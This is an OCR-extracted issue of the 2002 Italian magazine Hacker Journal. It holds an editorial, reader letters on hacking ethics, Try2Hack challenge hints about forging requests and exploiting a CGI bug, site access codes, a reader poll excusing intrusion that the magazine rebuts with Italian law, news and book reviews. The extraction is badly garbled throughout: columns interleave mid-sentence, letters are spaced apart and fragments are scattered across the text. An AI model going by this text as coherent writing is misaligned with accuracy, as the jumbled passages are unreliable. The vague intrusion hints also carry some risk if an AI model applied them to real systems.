Sei sulla pagina 1di 30

hack.

er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”

S!
È successo di nuovo. È il più tragico, mo-

I
struoso e inconcepibile evento; due bambine

AT
sono state rapite e uccise in Agosto in Inghil-

R
terra. Chi è il mostro? Qualcuno, come al so-

G
lito, la spara: Internet, il capro espiatorio
preferito degli ultimi anni. Holly e Jessica
frequentavano chatline; avranno conosciuto
lì l'orco. E giù fiumi di inchiostro a coprire co-
lonne dei quotidiani: sociologi, massmedio-
logi, psicologi, tutti a descrivere le nefan-
dezze della Rete. Poi, la svolta nelle indagi-
ni: si scopre che in questo caso gli orchi non

Strepitoso!
stanno dietro a un computer, ma dietro alla
cattedra. Sono il bidello e la maestra della
scuola elementare frequentata dalle bambi-
ne. Poco importa: il capro espiatorio preferi-
to dalla stampa tornerà utile per un'altra
tragica occasione, magari maturata in real-
tà dentro alla famiglia o all'oratorio.
il_tuo_nome@hackerjournal.it
grand@hackerjournal.it

HJ: intasate le nostre caselle


Ormai sapete dove e come trovarci, appena
Visita subito
possiamo rispondiamo a tutti, anche a quelli
incazzati. Parola di hacker. SCRIVETE!!! www.hackerjournal.it
Anno 1  N. 7 - 29 agosto/12 settembre 2002

Boss: theguilty@hackerjournal.it Usa le password che trovi a


Publisher: ilcoccia@hackerjournal.it
Editor: grAnd@hackerjournal.it,
Graphic designer: Marco Ranieri, pagina 7 per accedere alla
Michele Lovison
Contributors: Daniele Festa (cover picture)

Publishing company
Secret Zone e crearti una
4ever S.r.l.
Via Torino, 51
20063 Cernusco sul Naviglio
casella e-mail con indirizzo
Fax +39/02.92.43.22.35

Printing
Stige (Torino)
Distributore tuonome@hackerjournal.it!
Parrini & C. S.PA.
00187 Roma - Piazza Colonna, 361-
Tel. 06.69514.1 r.a.
20134 Milano, via Cavriana, 14
Tel. 02.75417.1 r.a.
Pubblicazione quattordicinale Avrai a disposizione 5 Mbyte
registrata al Tribunale di Milano
il 25/03/02 con il numero 190.
Direttore responsabile: Luca Sprea di spazio per i messaggi che
Gli articoli contenuti in Hacker
Journal hanno uno scopo prettamente potrai leggere dal Web o con
didattico e divulgativo. L’editore
declina ogni responsabilita’ circa
l’uso improprio delle tecniche e dei
tutorial che vengono descritti al suo
il tuo client e-mail preferito.
interno.
L’invio di immagini ne autorizza
implicitamente la pubblicazione gratuita
su qualsiasi pubblicazione anche non
della 4ever S.r.l.
Copyright 4ever S.r.l. Sbrigati! prima che qualcuno
Testi, fotografie e disegni,
pubblicazione anche parziale vietata.
Realizzato con la collaborazione di si freghi il tuo nickname!
Hacker News Magazine - Groupe Hagal Aria

2 | www.hackerjournal.it
Questo spazio è vostro!
Approfittatene, e fate lavorare quella tastiera!
o
r em vo
Sa uo la
n
di dico ì
e d !
OPEN SOURCE
in iove bre
G tem
t
2 se
1
I programmatori
OPEN SOUR
CE della vecchia guardia
Non avevo ancora il Quello che per me era solo un gioco ingenuità di allora. Ricordo che una
c o m p u t e r q u a n d o i m- iniziò a destare la curiosità dei miei volta ho configurato 3 PC, ho format-
parai a programmare. che mi incoraggiarono nella scelta di tati gli HD infestati da virus di vario
Avevo 11 anni ed era il un tipo di studi adeguato. genere, e li ho collegati in rete. Il tut-
1986 quando a mio cu- Mi iscrissi a ragioneria con indirizzo to per la modica spesa di 150.000 per
gino fu regalato un MSX. programmatore. Imparai il Cobol, per- una giornata di lavoro! Mettendo
Avevo sempre desiderato fezionai l'analisi e lo sviluppo degli qualcosa da parte, sono così riuscito
possederne uno, ma... Ahimè! algoritmi e... incredibile ma vero... nel 1996 a comprare il Pentium 100
A casa mia c'erano spese ben più im- v e n n i b o c c i a t o a l p r i m o a n n o ! L ' a m- con il quale vi sto adesso scrivendo.
portanti e così l'acquisto, di quello che metto è stata colpa mia, non avrei mai In seguito ho sostenuto dei colloqui
tutti consideravano solo un videogio- dovuto sputtanare, tutte quelle volte, con alcune software house. Stronzi pu-
co, non veniva mai preso in considera- la mia insegnante davanti a tutta la re loro! Mi hanno fregato i sorgenti
zione. Così passavo i miei pomerriggi classe. Non ne capiva un razzo, fotte- dei file di prova e alla fine se ne sono
estivi a casa sua, mangiando pane e va solo i soldi allo Stato. Continuava a sempre usciti con la frase "Cerchiamo
Nutella e fissando uno schermo con dire che gli esercizi proposti dal libro una figura dinamica, laureata che...".
scritto a lettere cubitali "Loading... di testo erano sbagliati, ma io li risol- Andate in malora, chi diavolo vi cre-
Please wait...". Molti programmi erano vevo e lei li lasciava sempre incomple- dete di essere?!
scritti in linguaggio macchina, altri in ti. Mi vendicai l'anno successivo, C o n o s c o l a u r e t a t i i n " S c i e n z e d e l l ' i n-
Basic... quando cambiai sezione. formazione" che non conoscono la dif-
Naque così il mio interesse per quella Riusci comunque a diplomarmi quasi a ferenza tra un interprete e un compi-
strana serie di codici. Lettere e nume- pieni voti! Avrei voluto iscrivermi al- latore!!! E che non sanno scrivere due
ri apparentemente indecifrabili, ma l'università ma, dalle mie parti, i figli righe di codice senza gli appunti del
che sapientemente combinati poteva- dei camionisti e delle casalinghe non professore!!! L'esperienza si matura
no aprire le porte della creatività. Ri- sempre riesco a completare gli studi. con la pratica, con la passione e con
cordo che litigavo spesso con mio cu- Così mi ritengo fin troppo fortunato se l'umiltà!
gino. Lui voleva solo giocare. Io vole- sono riuscito a prendere il diploma! Adesso ho 27 anni e faccio il ragionie-
vo capire come funzionava quella In seguito non avevo molta voglia di re in una piccola ditta, amo il mio la-
splendida macchina. Volevo rendermi fare il militare così frequentai un cor- voro e non lo cambieri per tutto il pre-
conto se si poteva andare oltre... Alcu- so post-diploma imparando il C++. stigio del mondo. Ho deciso di raccon-
ne volte mi lasciava solo a smanettare Venne comunque il giorno di servire la tare a Voi questa mia storia, perchè
col manuale e così poco alla volta ini- Patria e così parti... Mi diedero l'inca- ritengo le altre riviste sul mercato
ziai a comprendere quella sequenza rico di operatore informatico. Tutto troppo faziose. C'è in giro troppa gen-
di lettere e numeri. Imparai in fretta e sommato fu una bella esperienza, la- te che non ne capisce una beata sega!
altrettanto in fretta sviluppai i miei voravo al CED con personale civile Stronzi, fighetti, figli di papà che, so-
primi programmi in Basic che registrai (Ogni tanto passava anche qualche lo perchè hanno l'ultimo modello di
su cassette. Chi sa dove diavolo si tro- bella fighetta!), ho conosciuto ottimi PC, ritengono di capirne qualcosa
vano adesso! operatori e geniali programmatori dai d'informatica.
Passò qualche anno e mio cugino com- quali ho imparato tantissimo. Gente che parla di maniera assurda
prò un Commodore 64 (Bella creatura Dopo il congedo mi sono subito rim- "In questa picture le slides..." Ma par-
anche quella!), così il caro vecchio boccato le maniche e grazie alle mie late come magiate!!!
MSX mi fu regalato. In breve acquistai conoscenze informatiche ho sempre
p a d r o n a n z a a n c h e d e l l a n u o v a m a c- lavorato. Purtoppo ho avuto a che fa- Francesco
china sviluppandone del software. re con disonesti che sfruttavano la mia

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?


Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-
mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-
gia pane e worm).

www.hackerjournal.it |3
www.hackerjournal.it

mailto:
redazione@hackerjournal.it

SUGLI ARRETRATI ONLINE


alve, prima di oggi leggevo su
S internet la vostra rivista trovan-
dola molto interessante. Oggi ho
visto che per farlo serviva una pas-
sword che si trova sulla rivista
stampata. Se per sfogliarla on-line
devo comunque comprarla, non va-
le più la pena leggerla in internet
dato che ce l'ho in "carne ed ossa"
fra le mani!
Mi dispiace,anche perchè nel mio
paese (Bisceglie,prov. Bari) non ri-
esco a trovare la vostra rivista.Spe-
rando che io possa tornare a legge-
re la rivista on-line vi invio cordiali
saluti.
gitetoma

I numeri arretrati presenti sul nostro


sito sono pensati come un servizio in
più per i nostri lettori, che possono
fare affidamento su un archivio dei
numeri eventualmente persi, e non
come una modalità di consultazione Riceviamo da .Pillo-kill., e volentieri pubblichiamo, questa immagine
alternativa all'acquisto in edicola. realizzata in grafica 3d.
Non c'è bisogno di ricordare che noi
viviamo solo ed esclusivamente con
le vendite in edicola: non ci sono sequestrato dalla polizia, sono stati zio riprendeva notebook, masteriz-
pubblicità, né palesi né occulte. Ba- mostrati dei giornali tra cui ho rico- zatori, modem e altri accessori se-
sta comprare la rivista una sola vol- nosciuto il vostro, si proprio "Hacker questrati. Così come i produttori di
ta e si potrà godere di tutto l'archi- Journal". quegli apparecchi non possono ave-
vio arretrati per due settimane: mi Ora chi ha avuto il piacere, se non re alcuna responsabilità per i fatti
pare un servizio molto conveniente e l'onore, di sfogliare questa rivista commessi da alcuni stupidi, lo stesso
decisamente fuori dal comune (se conosce cosa questa tratta e quali vale per la nostra rivista.
conoscete altri editori che fanno sono i suoi "principi", ma, mostran-
qualcosa di simile, fateci un fischio). do l'immagine del giornale in un VERGOGNOSO BOICOTTAGGIO?
servizio non proprio di "cronaca ro- ara redazione di hackerjournal,
UNA STRANA PUBBLICITÀ
n saluto a tutti e complimenti
sa", cosa avrà pensato la gente "co-
mune"?
C vi scrivo poiché da molti mesi
sto assistendo ad una antipatico
U per la rivista.
Sono un vostro fedele lettore e vole-
Non pensate che vi sia stata fatta
cattiva pubblicità??
quanto vergognoso boicottaggio da
parte degli internet server provider
vo segnalare un fatto sembratomi Secondo me, ciò ha influito molto e nei confronti di quei siti hacking che
alquanto strano.... in senso negativo sull'opinione al- liberamente esprimono il proprio
Nel TG2 dell'una del primo di ago- trui (io me la sono presa un pò a pensiero e mettono a disposizione
sto, è stato trasmesso un servizio su male!!!) software non conforme ai regola-
una banda di "hacker" (come li ha Qual è la vostra opinione in merito? menti dei provider.
definiti il giornalista) che avrebbe CONTINUATE COSI'!!!!!!!!!! Bisogna ricordare che i virus e i
violato siti (tra cui quello della NA- Rushkio software di per sé non sono né buo-
SA) e svolgeva traffici illeciti....il ni né cattivi: tutto dipende dall'uso
punto è che, mostrando il materiale Mah, oltre a Hacker Journal il servi- che se ne fa. Premesso questo, mi

4 | www.hackerjournal.it
o A
em vo STAMP
LIBERAITÀ
r
Sa uo la
n
di dico ì
e d ! C
in iove bre
G ttem
e
NO PINUFBOBRLMIAZIONI
°s SOLO ARTICOLI
12 E

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


piacerebbe che nei prossimi numeri di stabilire le regole che vuole. Alcu- TECNICHE DI INTRUSIONE
della vostra rivista pubblichereste ni non accettano materiale pornogra- iao ragazzi, volevo sapere
degli articoli su come scaricare soft-
ware direttamente dai siti senza ve-
fico, altri se la prendono con exploit
e crack, altri ancora vietano siti dai
C u n a c o s a v i s t o c h e v o i d h a c-
king ve ne intendete: io volevo
dersi apparire il messaggio che re- contenuti violenti o razzisti (e non ce s a p e r e s e e s i s t e u n m o d o a l t e r-
cita pressappoco cosi: "Pops il soft- la sentiamo di dargli torto). Non ti nativo ai trojan per entrare nel
ware che cercavi non e' scaricabile piace la policy di un sito di hosting? PC di una persona.
in quanto rimosso perche' non con- Cercane un altro: il bello di Internet è gitetoma
forme alla politica di Arianna". che puoi scegliere tra servizi simili
sparsi in tutto il mondo. Perché voler Sì, puoi usare un cacciavite. Però
Mah, sai, un provider privato che ti a tutti i costi buggerare Arianna sca- ti assicuro che lì dentro si sta
offre spazio gratuito ha tutto il diritto valcando le sue imposizioni? molto stretti. A parte gli scherzi,

Try2Hack, fate vedere di che pasta siete fatti!


TRY2HACK:METTETE ALLA LIVELLO 7
PROVA LA VOSTRA ABILITÀ Tutto qui, direte voi? Basta fare clic per pas-
sare al livello successivo? No. Le cose sono
A parole siete tutti bravi, ma riuscite ve- più complicate di quello che sembra. Per ac-
ramente a passare dei livelli di protezio- cedere alla pagina dove inserire user name
ne? Dimostratelo al mondo e a voi stessi e password dovrete "falsificare" la richiesta
cercando di superare i dieci livelli di dif- di connessione. Poi, bisogna anche inserire i
ficoltà del giochino Try2Hack (che si leg- dati giusti. Sotto.
ge "try to hack"), presente sul nostro sito LIVELLO 8
www.hackerjournal.it. Per passare questo livello bisognerà sfrutta-
Il gioco consiste nel superare i vari livel- re un baco del Cgi che si occupa dell'autenti-
li, inserendo ogni volta le password cor- cazione. Come prima cosa quindi dovrete
rette (oppure arrivando in altri modi alle scoprire quale sia, e poi fare una bella ricer-
pagine protette da password). ca per trovare un suo baco famoso. Grazie
Per farlo, potreste avere bisogno di alcu- ad esso, troverete il modo di procurarvi un
ni programmi (Macromedia Flash, Softi- nome utente e una password cifrata, da de-
ce, VisualBasic). cifrare con un programma ad hoc.
Di tanto in tanto qualche lettore ci scrive LIVELLO 9
per dire che alcuni livelli sembrano non Anche il livello 6 utilizza un proIn questo li-
funzionanare. Noi vi possiamo assicura- vello ci si sposta su Irc. Seguendo le istruzio-
re invece che tutti quanti funzionano ni fornite, si otterrà una frase da decifrare (il
esattamente come dovrebbero. metodo è molto, molto semplice). Fatto ciò,
Chi ha orecchie per intendere... si otterrà una password da utilizzare per
collegarsi a un altro canale Irc, dove ci ver-
rà comunicata una lunuga stringa binaria
da decodificare. Fatto ciò, si ottengono indi-
Nuova password! zi per poter inserire il proprio nick tra gli
utenti autorizzati del bot che darà la solu-
Ecco i codici per accedere alla Secret Zone zione per passare al livello 10.
del nostro sito, dove troverete informazioni
e strumenti interessanti. Con alcuni browser, gh Scores - High Scores - High Scores - Hig
potrebbe capitare di dover inserire due vol-
te gli stessi codici. Non fermatevi al primo
tentativo.
Mandateci una mail a: try2hack@hackerjournal.it
scrivendo il numero del livello a cui siete arrivati e le pas-
user: chin8 sword di tutti i livelli precedenti. Sui prossimi numeri pubbli-
cheremo l’elenco dei migliori.
pass: 3mendo

www.hackerjournal.it |5
www.hackerjournal.it

le tecniche sono svariate, anche f o n o ( è p o i i n u t i l e c e r c a r e d i n a-


s e b e n e o m a l e p r e v e d o n o l a p r e- s c o n d e r l o d i s a b i l i t a n d o l a f u n z i o-
senza di un servizio di accesso ne di riconoscimento del numero
remoto di qualche tipo (un server c h i a m a n t e : i l d a t o v i e n e r e g i s t r a-
telnet o di altro tipo). to ugualmente dai provider).
L'articolo però non era inteso a
INCONTRI E RADUNI d a r e s u g g e r i m e n t i s u c o m e r i m a-
da un po' di tempo che leggo nere anonimi, ma su come evitare
È la vostra rivista, naturalmente
dal primo numero e come pagina
c h e q u a l c u n o p o s s a r u b a r e i l n o-
s t r o a c c o u n t d i a c c e s s o p e r c e r-
principale ho quella di HJ. Vorrei care di falsificare la propria
proporvi, come ogni rivista che identità in rete. È un po' come
tratta sull'hacking, di aggiungere q u a n d o u n c r i m i n a l e f a u n a r a p i-
u n a n u o v a s e z i o n e , q u e l l a r i- na con un'auto rubata; anche se
guardante gli incontri o raduni p e r f e t t a m e n t e i n n o c e n t e , i l l e g i t-
nelle varie località italiane. timo proprietario ha quanto meno
L a c o s a d o v r e b b e e s s e r e d i f o n- delle scocciature. Scocciature
damentale aiuto per tutti quelli che è sempre meglio evitare.
che vogliono scambiarsi opinioni
e tecniche sull'hacking. ETICA E MORALE HACK
KINGHACK olevo chiedere ai "grandi geni

B e h , s e q u a l c u n o v u o l e o r g a n i z-
V dell' hacking" di cui spesso ho
letto le mail pubblicate, se a loro
z a r e i n c o n t r i , r a d u n i ( o l e i m m a n- sarebbe piaciuto, quando erano
cabili pizzate) a sfondo tecnico- alle prime armi, che qualcuno
h a c k e r o s o , p u ò m a n d a r c i u n a s e- piu "bravo" di lui (c'è sempre
gnalazione: inseriremo volentieri q u a l c u n o + b r a v o d i n o i ) s i d i-
l'appuntamento nelle news. Una vertisse a entrargli nel PC o a
sola raccomandazione: la rivista Joker ci manda questa immagine a metà strada
tra l'Uomo Ragno e il maniaco dei giardinetti.
bvyi e n e c h i u s a d i e c i g i o r n i p r i m a
by

d eel l a s u a u s c i t a i n e d i c o l a . M a n- Arretrati
dateci la mail con un anticipo
sufficiente. Q u i n d i s e q u a l c u n o d i v o i i n t e n-
e abbonamenti
de far danni a qualche server ( o Siete in tanti a chiederci se sia possibile ab-
IMPRECISIONE SUL N. 6 l'ha già fatto ) , con username e bonarsi o richiedere i numeri arretrati di
a l v e g e n t i l e r e d a z i o n e d i h a c- passwd di un amico, sappia che
S ker journal, volevo segnalare
u n e r r o r e i n u n a r t i c o l o p u b b l i-
non ha risolto niente, perché
quando l'admin del server farà
Hacker Journal, che ormai stanno diventan-
do oggetti da collezione. Stiamo cercando di
allestire le strutture necessarie, ma potreb-
c a t o n e l n u m e r o s c o r s o . L ' a r t i c o- d e n u n c i a a l p r o v i d e r e g l i c o m u- be essere necessario un po' di tempo. Intan-
lo (pag. 20) è intitolato "Apriti n i c h e r à l ' i n d i r i z z o I P d a c u i p r o- to, potete trovare i PDF di tutti i vecchi nu-
sesamo". Bene, l'autore SN4KE v e n i v a l ' a t t a c c o , i l p r o v i d e r f o r- meri sul sito nella Secret Zone, e già che sie-
d i c e d i p r o t e g g e r e l a n o s t r a p a s- n i r à a l l ' a d m i n o a l l e G D F , i l n u- te sul sito, iscrivetevi alla nostra mailing list:
s w o r d p e r l a c o n n e s s i o n e a l n o- mero telefonico da cui proveniva sarete avvisati non appena i servizi abbo-
stro provider perchè " durante la la chiamata. Quindi attenzione namenti e arretrati saranno disponibili.
connessione sembrerà che siamo p r i m a d i s e g u i r e i s t r u z i o n i s b a-
s t a t i n o i a c o n n e t t e r c i q u a n d o i n- gliate senza accettarsi di ciò che
vece è stato lui " , cioè colui che è s t a t o s c r i t t o . G e n t i l e r e d a z i o-
ha usufruito del nostro username ne, se sbaglio rispondetemi sulla
e p a s s w o r d p e r c o n n e t t e r s i a i n- rivista...
ternet. NULLA DI PIU' FALSO: Advanced
q u a n d o n o i c i c o n n e t t i a m o a I n-
t e r n e t i l n o s t r o p r o v i d e r c i r e g i- D i c i a m o c h e l ' a u t e n t i c a z i o n e a v-
stra e ci identifica con il numero viene a entrambi i livelli, sia con
di telefono da cui proviene la username e password, sia con la
chiamata, e non con l'username. r e g i s t r a z i o n e d e l n u m e r o d i t e l e-

6 | www.hackerjournal.it
A
STAMP
S a
mo
re vo
o
nu cola
LIBERAITÀ
C
i
d di
e dì
in iove bre
! NOOPINUFBOBRLMIAZIONI
L
SO L OLI
G ttem E ARTIC
e
°s
12

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


fargli crashare il browser; così creare scompiglio o di rompere
soltanto per dimostrare che lo le P***E. In particolar modo non
sa fare. comprendo i prima citati "grandi
METTETEVI CON QUELLI DELLA geni dell'hacking" che si buttano
VOSTRA TAGLIA!! Cosa volete v i a c o s ì , c h e s i s p r e c a n o i n q u e-
D I M O S T R A R E ? ? N o n m i c o n s i d e- s t o m o d o ; p e n s o a c c r e s c e r e b b e-
ro un hacker, perchè non penso ro ugualmente la propria fama
d i p o t e r m i d e f i n i r e t a l e s o l o p e r- ( s e è q u e l l a c h e c e r c a n o ) s e c e r-
chè conosco il SUB7!! c a s s e r o a l t r e s t r a d e e i f i n i s a-
(oooohh....che hacker!), ma rebbero più nobili.
p e n s o d i e s s e r e n e l g i u s t o q u a n- Spero pubblichiate la mia mail.
do affermo che un VERO hacker Sono sicuro che non risolverà il
n o n f a d a n n i s o l o p e r f a r s i n o t a- problema ma forse qualcuno ci
re, per dimostrare che c'è o che farà un pensierino. ;)
"il computer sicuro è solo quello
s p e n t o . . . " m a p e r c e r c a r e d i a i u- PS: vi allego una JPG sul lavoro
tare gli altri! che dovrebbero fare i lamer
A p p r e z z o e s t i m o m o l t o t u t t i c o- gandalf86
loro che mettono a profitto le
proprie conoscenze a scopo
"umanitario" come ad esempio Hai tutta la nostra comprensione
coloro che entrano nei canali e solidarietà, gandalf86. Per
IRC di pedofili e non appena quanto ci riguarda, quelli che A partire da questo numero abbiamo deciso di
qualcuno si lascia scappare f a n n o c o s e c o m e q u e l l e c h e d e- fare un po' più sul serio con il sondaggio presen-
qualcosa.... scrivi non sono e non saranno te sul sito: abbiamo lasciato da parte i quesiti
P r o v o i n v e c e d i s p r e z z o , a n z i p e- mai "geni dell'hacking". sulla distribuzione Linux più fica o sul browser
na per coloro che giocherellano migliore, per affrontare temi di cui spesso non si
con internet con il solo scopo di parla in pubblico. A quanto pare, la cosa piace
anche a voi, visto che avete votato in tanti (3114,
più del doppio dei precedenti sondaggi).
La stragrande maggioranza dei lettori che han-
no risposto (80%), ritiene che è lecito entrare
abusivamente in un sistema se non si danneg-
gia nulla o se si avverte l'amministratore della
falla di sicurezza che ha permesso la violazione.
Saremmo curiosi di sapere in quanti avrebbero
risposto allo stesso modo se la domanda fosse
stata posta in senso inverso, e cioè "ritieni che sia
giusto che altri possano penetrare nel tuo com-
puter, se non danneggiano nulla o se ti avvisano
della falla di sicurezza?". Siete proprio sicuri che
non avreste problemi se qualcuno si mettesse a
leggere i vostri file personali, o sbirciasse tra le
foto delle vostre vacanze? (O nella "collezione"
che avete in quella cartella nascosta?)
Considerazioni etiche a parte, ricordate comun-
que che, per la legge, entrare abusivamente in
un sistema altrui è sempre un reato penale (art
615 ter del Codice Penale), punibile con pene fi-
no a tre anni di prigione se non si danneggia
nulla, fino a cinque anni se oltre alla violazione
c'è anche distruzione o cancellazione di dati, e
da tre a otto anni se si attaccano sistemi relativi
alla sicurezza pubblica o alla sanità o alla prote-
zione civile o comunque di interesse pubblico.

www.hackerjournal.it |7
news
HOT! ! PGP È VIVO E LOTTA INSIEME A NOI!

p o r a t i o n
! CLAMOROSO: ( w w w. p g p . c o m ) ,
LA CASA BIANCA ISTIGA fondata per l'occasio-
GLI HACKER ne da alcuni manager
che avevano in pas-
urante il suo intervento al raduno hacker sato lavorato allo svi-
DBlack Hat Security di Las Vegas, il consi- luppo e alla commer-
gliere della Casa Bianca Richard Clarke ha cializzazione di PGP. Il
accusato pesantemente l’industria del soft- programma quindi
ware per i numerosi bachi che infestano i non è più un prodotto
programmi. E non si è limitato a questo: ri- marginale di un'azien-
volgendosi alla platea, ha invitato gli hacker da che ha ben altri in-
a continuare a ricercare bachi e falle nella si- teressi nel campo de-
curezza di software e sistemi, avvisando poi gli antivirus, come
i produttori affinché ci mettano la solita top- McAfee, ma il pro-
pa (o le strutture governative se questi, co- dotto di punta di un'a-
me spesso accade, non ci sentono molto da zienda più piccola ma
quell’orecchio). Qualcuno ha obiettato che le più motivata. I risul-
software house non devono contare sul la- tati non si sono fatti
voro (gratuito) degli hacker per risolvere i attendere, e PGP Cor-
propri problemi, ma che devono farlo in pri- poration ha annun-
ma persona. Gli animi si sono nuovamente a molto tempo il più celebre programma di ciato il rilascio della versione 8 di PGP, che sarà
rasserenati quando Clarke ha duramente cri- D cifratura per PC, Pretty Good Privacy (PGP compatibile anche con Windows XP e Mac OS
ticato quelle software house che biasimano per gli amici) sembrava destinato a non riceve- X, e includerà nuove funzionalità come il sup-
(o addirittura querelano) quegli hacker che re aggiornamenti. Network Associates porto di Lotus Notes (per Windows) e la possi-
individuano i bachi e informano la comunità (www.nai.com), che lo aveva acquistato nel 97, bilità di leggere e scrivere volumi creati con
informatica dei rischi relativi. K dopo aver sfruttato la tecnologia alla base di PGPDisk su piattaforme differenti.
PGP per alcuni prodotti della linea McAfee, ave- Due tra gli annunci fatti da PGP Corporation so-
va posto uno stop allo sviluppo del programma no particolarmente graditi: il primo è che il codi-
! AGGIORNAMENTO (l'ultima major release di PGP, la 7, risale al set-
tembre 2000). Nemmeno l'uscita di come Win-
ce sorgente delle nuove versioni continuerà a
essere rilasciato pubblicamente, per permettere
SICUREZZA MAC OS X dows XP o Mac OS X, sembrava stimolare la una revisione del codice (unica vera garanzia
l 2 agosto Apple ha rilasciato un importan- realizzazione di una nuova versione ad hoc per contro eventuali backdoor inserite dal produtto-
Ite update per migliorare la sicurezza di questi nuovi sistemi operativi. re per favorire governi o aziende); il secondo an-
Mac OS X. I moduli che sono stati modifica- Il 19 agosto scorso però si è intravista una luce nuncio gradito è che continuerà a essere distri-
ti sono Apache, OpenSSH, OpenSSL, di speranza: Network Associates ha infatti ce- buita una versione gratuita di PGP, per uso non
SunRPC e mod_ssl. duto tutti i prodotti PGP alla neonata PGP Cor- commerciale. K
L'aggiornamento richiede la presenza della
versione 10.1.5 di Mac OS X e si può instal-
lare automaticamente tramite l'utility Soft- ! PC SMILE FINALMENTE È IN EDICOLA!
ware Update del sistema. K

oveva essere in edicola il 12 agosto ma ha ritar- Scriveteci cosa ne pensate !


! OPENOFFICE Ddato qualche giorno... Nell’ultima pagina di Hacker Journal trovate un
Ma ora è finalmente arrivata la rivista più divertente buono sconto di 1Euro per l’acquisto del primo nu-
ANCORA PIÙ APERTO dell’anno! Correte in edicola a comprare PC Smile, la mero di PC Smile! K
ccogliendo le richieste avanzate dalla nuova rivista, con un Cd-Rom in regalo pieno zeppo di
Apropria comunità di sviluppatori open filmati divertentissimi, giochi realizzati in
source, Sun Microsystems ha modificato le Flash, finti virus (da usare con attenzione!),
PC
proprie licenze riguardanti lo sviluppo del co-
dice e della documentazione per Open Offi-
ce. Tutto il codice sorgente sarà licenziato
sotto la GNU Lesser General Public License
(LGPL) e la Sun Industry Standards Source
License (SISSL); agli sviluppatori che offri-
ranno porzioni di codice verrà garantito il
immagini sexy e vignette umoristiche da
utilizzare come sfondo del desktop o da
inviare agli amici. PC Smile è utilizzabile
sia dagli utenti Mac, sia da quelli Windows.

"MICROSOFT HA MIGLIORATO L'OPEN SOURCE, COME


BILL LADEN HA MIGLIORATO LA SICUREZZA NEGLI
Smile
mantenimento della paternità del proprio AEREOPORTI"
prodotto. K
> Eric S. Raymond

8 | www.hackerjournal.it
news

! BUGTRAQ SI VENDE A SYMANTEC!


HACKBOOK
che pare stiano per la- " HACKER DIARIES:
sciare l'azienda. La paura CONFESSIONI
è che, nonostante le ras- DI GIOVANI
sicurazioni a riguardo,
Symantec possa modifi- HACKER
care la linea editoriale di Autore: Dan Verton

o
BugTraq, tradizionalmen- ISBN: 88-386-4283-4

t
ra
te orientata al "full dis- Pagine: 272
closure" (cioè alla pub- Prezzo: € 15,00

su blicazione di tutte le in- Editore:

n
formazioni su bachi ed McGraw-Hill

ce
exploit), o che addirittu-
ra Symantec possa cen- prima vista, il libro
surare o manipolare in- Aparrebbe rivolgersi a chi vuole farsi un'idea
formazioni per promuo- del mondo dell'hacking. Il comunicato stampa
n Luglio Symantec ha acquisito per circa vere i propri prodotti relativi alla sicurezza, o del libro infatti promette: "Entrerai nel mondo del-
I75 milioni di dollari SecurityFocus per non danneggiare l'immagine di importan- la caccia internazionale ai pirati della cibernetica
(www.securityfocus.com), l'azienda che ti partner (per esempio uno, che ha sede a e nella mente degli adolescenti hackers". In que-
pubblica BugTraq, la mamma di tutte le Redmond, produce sistemi operativi e passa sta dichiarazione, il tradizionale accoppiamento
newsletter sulla sicurezza informatica, nata a Symantec informazioni vitali per la produ- hacker=criminali non fa presagire molto di buo-
nel remoto 1993. La notizia non è stata pre- zione dei popolari antivirus. Insomma, il tema no. Andando a spulciare però, si possono trova-
sa molto bene dai lettori della newsletter, e del conflitto di interessi non riguarda soltan- re interessanti informazioni sulla storia dei più
anche da alcuni dirigenti di Security Focus, to l'Italia... K eclatanti attacchi degli ultimi anni, parecchie in-
terviste ad agenti dell'FBI, psicologi criminali,
agenti di pubblica sicurezza e anche ad hacker,
! WARDRIVING AL VOLO in attività e non. K

" LINUX MUSICA


E SUONI
Udel wardriving la pratica che consiste
n paio di numeri fa abbiamo parlato con antenna esterna e il programma
Netstumbler, e un notebook Toshiba Te-
nel mettersi al volante di un auto con un cra 9000 con antenna incorporata e il Autore: Dave Phillips
portatile dotato di connessione wireless, programma Kismet. K ISBN: 88-8378-020-5
e andare in giro per Pagine: 480
la città cercando Prezzo: € 29,95
punti di accesso Editore: Hops Libri
senza protezioni di
he vogliate risolvere pro-
Cblemi nella trattazione del-
sicurezza. Ebbene,
alcuni membri del
b l o g l'audio da parte del pinguino, o trasformare la vo-
w w w. e 3 . c o m . a u , stra Linux box in uno studio di registrazione mu-
che si occupa di re- sicale, questo è il libro che fa per voi. Linux Mu-
ti wireless, hanno sica & Suoni offre un'approfondita introduzione
spinto il concetto per cominciare a registrare, archiviare e suonare
un po' più in la, o musica con il sistema operativo Linux.
meglio, un po' più Gli argomenti trattati sono:
in alto. Sorvolando - registrare, mixare e aggiungere effetti musicali
la città di Perth con - lavorare con file Mod, Midi e Mp3
un piccolo aereo- - archiviare e masterizzare brani
plano, alla quota di - utilizzare software di sintetizzazione musicale
50 metri, hanno tro- come Csound
vato 92 basi di ac- - impostare il sistema per condividere le risorse
cesso sprotette in musicali del PC
un colpo solo. Per - trasmettere dal vivo su Internet
l'esperimento sono Per ogni argomento, vengono presentate le ap-
stati usati un pal- plicazioni relative. Al libro è associato anche un
mare Compaq Ipaq sito Web, zeppo di risorse e link utili. K

www.hackerjournal.it |9
HJ ha surfato per voi...
I classici 15 minuti di celebrità! Questi sono i vostri
della Rete

www.robertgraham.com/pubs/
hacking-dict.html
Istruttivo dizionario del gergo
hacker, che accanto alla
definizione tecnica delle varie
parole elencate, descrive anche il
loro significato nella cultura
hacker (per esempio, si da la
definizione del file virtuale
/dev/null ma si dice anche in
frasi come "Se non ti piace quello
che faccio, manda pure i tuoi www.virused2.too.it
commenti in /dev/null). Meritano
una visita anche i livelli
superiori, dove si trovano Io sono VIRUSED2 e ho 20 anni. Vi chiedo di pubblicare il mio
informazioni sullo sniffing e una
raccolta di consigli e aneddoti sito sulla vostra rivista. Vi assicuro che farà un figurone sulle
sulle visite ai siti porno durante vostre pagine .
